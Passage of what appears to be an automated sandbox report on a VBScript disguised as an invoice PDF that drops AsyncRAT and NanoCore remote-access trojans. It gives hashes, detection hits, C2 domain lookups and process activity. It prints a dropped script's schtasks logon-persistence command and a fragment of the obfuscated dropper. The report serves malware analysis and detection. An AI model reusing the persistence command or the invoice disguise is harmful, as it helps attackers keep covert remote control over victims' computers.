                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 62%, Browse
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse
                                            C:\Users\user\AppData\Local\Temp\fi.exe
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):207360
                                            Entropy (8bit):7.448816161442748
                                            Encrypted:false
                                            SSDEEP:3072:wzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIxuSAShCWi5bu/qaBAIfG8vabc:wLV6Bta6dtJmakIM5EFhCWKbuf+PL4Tl
                                            MD5:86A588C5A10A04AF998DBAD9FF9A31D1
                                            SHA1:8AC3E114D36F6674BF64D7F45221207E8575EA62
                                            SHA-256:B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
                                            SHA-512:8978104324435B461BE67E148D44271A04A86550C7C1D8C5F474B1A7E63DA32FD9400F63A767555F13A2CFB21EEC32AAC6CA387F39C048FD4E36333CF6747EC9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: Virustotal, Detection: 81%, Browse
                                            • Antivirus: Metadefender, Detection: 91%, Browse
                                            • Antivirus: ReversingLabs, Detection: 100%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:ASCII text, with CR, LF line terminators
                                            Category:dropped
                                            Size (bytes):221
                                            Entropy (8bit):4.520339522389818
                                            Encrypted:false
                                            SSDEEP:3:jmSGFEm8nsFy0ijQLHBD/uOuG+rBTNAW23e6wDnoNN+EaKC5eiFpFVLjN:jaNqsE61/u5FBzk/wjoNN7aZ5e6/
                                            MD5:13B68193AE7BF8E04468F23B2F878751
                                            SHA1:FBCB57D90B7ADFEB963E54ED0000610B6F88B939
                                            SHA-256:97931461E7E1E8D01E0045A33E823D4B25AB89A7FC2BDD2A6BC79FE45DCF34C4
                                            SHA-512:598E9805A89BB3CD386554C8A946EC28217B781DDA76106E4B45304EAC3FCDA1EE858CDCBB3D64E3F4A46F17B5EBE6AE72096921FEADF4190B1C65D6B03A8E14
                                            Malicious:true
                                            Preview: Set wshShell = CreateObject("WScript.Shell") ..ret = wshShell.Run ("schtasks /create /sc onlogon /rl highest /tn Notepads.exe /tr ""C:\Users\user\AppData\Roaming\Notepads.exe", 0, False)
                                            C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                            Process:C:\Users\user\AppData\Local\Temp\fi.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):8
                                            Entropy (8bit):3.0
                                            Encrypted:false
                                            SSDEEP:3:Iq8:Iq8
                                            MD5:CC22F0048AEA8CDC7CFBCF7E10818E98
                                            SHA1:D27C83B167C3FAA39B8B9D10ECDB01D244D18A55
                                            SHA-256:35A0A75FA2AC5DF4A72BC15E1C68536D4B09C9EFB506BC3CF8CF33AD207AAAC1
                                            SHA-512:DCEA6835062629A748B948870ED47A5BF6F6E245A654D44E3240B9F0BCC20D1EF33BA417F66CE8FB2608342D1F89B5C2796FA521A95EC7B0D718333D4F95F2CF
                                            Malicious:true
                                            Preview: .W..j..H
                                            C:\Users\user\AppData\Roaming\Notepads.exe
                                            Process:C:\Users\user\AppData\Local\Temp\ame.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):121856
                                            Entropy (8bit):5.7883947305405865
                                            Encrypted:false
                                            SSDEEP:3072:eXPeQ7X4XTwzyt1IeqsH/ebouOtyr3OrKHDU:g7X4XTIytGeqsH/ebdOtvE
                                            MD5:F7F64EC1756119F19D52FB140E22382F
                                            SHA1:C4FA973B801D954562FE00AC7BD2C6D051AE6E2F
                                            SHA-256:C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
                                            SHA-512:F29A10012A4E7EF6989BCEA75554B12A17415FBA4D8181C6A2B3AE0E663FE59B4C5ED910583F898D5C36A5178041A9ADCF92EC758B45CEA082165E596D7061BA
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 76%
                                            Joe Sandbox View:
                                            • Filename: Spec_PDF.vbs, Detection: malicious, Browse
                                            • Filename: SpecPDF.vbs, Detection: malicious, Browse

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines, with CRLF line terminators
                                            Entropy (8bit):5.625953655922885
                                            TrID:
                                            • Visual Basic Script (13500/0) 100.00%
                                            File name:Invoice No F1019855_PDF.vbs
                                            File size:498648
                                            MD5:ce4dcec84bfeba49404fa70f5d137645
                                            SHA1:c31021953c59af126d0095bea70c26ca02a2d954
                                            SHA256:ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
                                            SHA512:206f93128c63f78891cd55aff0a2ffe74696845df2f1d2a359bd569716f2a8a7d68c9b12c724c3b5e35963664eba8ce41d8eb65c54f5f36d256fb850635e7b01
                                            SSDEEP:12288:hpwkVfVJwJJTtAm+7Jx1zCBEDiBsrvODJ2+oDhX+K2jid:/wkVfsJoz8srvOXoZdMid
                                            File Content Preview:on error resume next..Dim gTzLXUWzCBikJZhvnBenaiztweMohtxHSfLxABGzBuMkSVcBIAEZctzxUFPtIhRIDbRdOkvmvemfWPbaCKghoYeYgNculNrTdDgqDynYESexHTbFdpqxBjTfwtxAHAAhnSCSikWDXIdVuhRMmXRvWuSujBuKBmQDSwKpRJWsTmZtGykPbkOkjELsAIihqLClrZDyWcvcAYc..'jUYnlQfiRYgTNkRoIapCHko

                                            File Icon

                                            Icon Hash:e8d69ece869a9ec4

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            05/04/21-19:09:41.909556 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:41.947594 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
                                            05/04/21-19:09:41.948113 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:41.983261 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 5.56.20.161 | 192.168.2.6
                                            05/04/21-19:09:41.983749 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.024316 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 81.95.15.57 | 192.168.2.6
                                            05/04/21-19:09:42.024859 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.066114 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 152.195.101.202 | 192.168.2.6
                                            05/04/21-19:09:42.066597 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.125981 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 152.195.101.129 | 192.168.2.6
                                            05/04/21-19:09:42.126280 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 93.184.221.240
                                            05/04/21-19:09:42.166881 | ICMP | 408 | ICMP Echo Reply | | | 93.184.221.240 | 192.168.2.6
                                            05/04/21-19:09:51.927237 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
                                            05/04/21-19:09:52.614087 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8
                                            05/04/21-19:09:53.652130 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.6 | 8.8.8.8

                                            Network Port Distribution

                                            TCP Packets


                                            UDP Packets


                                            ICMP Packets

                                            Timestamp                              Source IP     Dest IP   Checksum  Code                Type
                                            May 4, 2021 19:09:51.927237034 CEST    192.168.2.6   8.8.8.8   d008      (Port unreachable)  Destination Unreachable
                                            May 4, 2021 19:09:52.614087105 CEST    192.168.2.6   8.8.8.8   d008      (Port unreachable)  Destination Unreachable
                                            May 4, 2021 19:09:53.652129889 CEST    192.168.2.6   8.8.8.8   d008      (Port unreachable)  Destination Unreachable

                                            DNS Queries


                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            May 4, 2021 19:09:51.643963099 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:51.927154064 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:52.613918066 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:53.652007103 CEST | 8.8.8.8 | 192.168.2.6 | 0x1f2a | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:09:57.901256084 CEST | 8.8.8.8 | 192.168.2.6 | 0xa655 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:09.302356005 CEST | 8.8.8.8 | 192.168.2.6 | 0x6c53 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:32.284786940 CEST | 8.8.8.8 | 192.168.2.6 | 0xb54c | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:38.388328075 CEST | 8.8.8.8 | 192.168.2.6 | 0x7013 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:10:44.475996017 CEST | 8.8.8.8 | 192.168.2.6 | 0xae48 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:07.113138914 CEST | 8.8.8.8 | 192.168.2.6 | 0x8756 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:13.282305002 CEST | 8.8.8.8 | 192.168.2.6 | 0x7be | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:19.108181953 CEST | 8.8.8.8 | 192.168.2.6 | 0xbae2 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:34.134166002 CEST | 8.8.8.8 | 192.168.2.6 | 0x2258 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:39.478065014 CEST | 8.8.8.8 | 192.168.2.6 | 0xf9f0 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:43.115463972 CEST | 8.8.8.8 | 192.168.2.6 | 0x9541 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:44.879615068 CEST | 8.8.8.8 | 192.168.2.6 | 0x645d | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:52.723125935 CEST | 8.8.8.8 | 192.168.2.6 | 0xeab6 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)
                                            May 4, 2021 19:11:52.997445107 CEST | 8.8.8.8 | 192.168.2.6 | 0x4cd3 | No error (0) | sys2021.linkpc.net |  | 79.137.109.121 | A (IP address) | IN (0x0001)

                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Memory Usage

                                            High Level Behavior Distribution

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:19:09:42
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:high

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\ame.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Local\Temp\ame.exe'
                                            Imagebase:0x500000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 62%, Virustotal
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\fi.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Local\Temp\fi.exe'
                                            Imagebase:0x40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 81%, Virustotal
                                            • Detection: 91%, Metadefender
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:09:56
                                            Start date:04/05/2021
                                            Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                            Imagebase:0xc40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 81%, Virustotal
                                            • Detection: 91%, Metadefender
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:11:18
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Roaming\Notepads.exe'
                                            Imagebase:0xee0000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0x7ff6992a0000
                                            File size:226816 bytes
                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:19:11:20
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:19:11:22
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0xf40000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Disassembly

                                            Code Analysis

                                              Executed Functions

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: 998b15824d186ccfc2c742e726ad13905e40b1c73ee53c9bad4f64c13ea3b704
                                              • Instruction ID: 3627df32f0df6bf16833a6f17f405f3e353e6a267511bf159f4d77118bfc2c38
                                              • Opcode Fuzzy Hash: 998b15824d186ccfc2c742e726ad13905e40b1c73ee53c9bad4f64c13ea3b704
                                              • Instruction Fuzzy Hash: 7591A132B18D0D8FEB98F76C84A56B9B7E2FF88310F444579D00DE3296DE286C468741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: d5f2490481cfb6bd09799427ff038aba3515974dacb25bffb0823d22066603e9
                                              • Instruction ID: d718ab9d7bb0e5bbaadfd9340572efeca1f79076cd248684196100ce0bbb099a
                                              • Opcode Fuzzy Hash: d5f2490481cfb6bd09799427ff038aba3515974dacb25bffb0823d22066603e9
                                              • Instruction Fuzzy Hash: 0C91B232B18D4D4FEB98E76C84A56B8B7E2FF99310F04057AD04DE3297DE28AC468741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
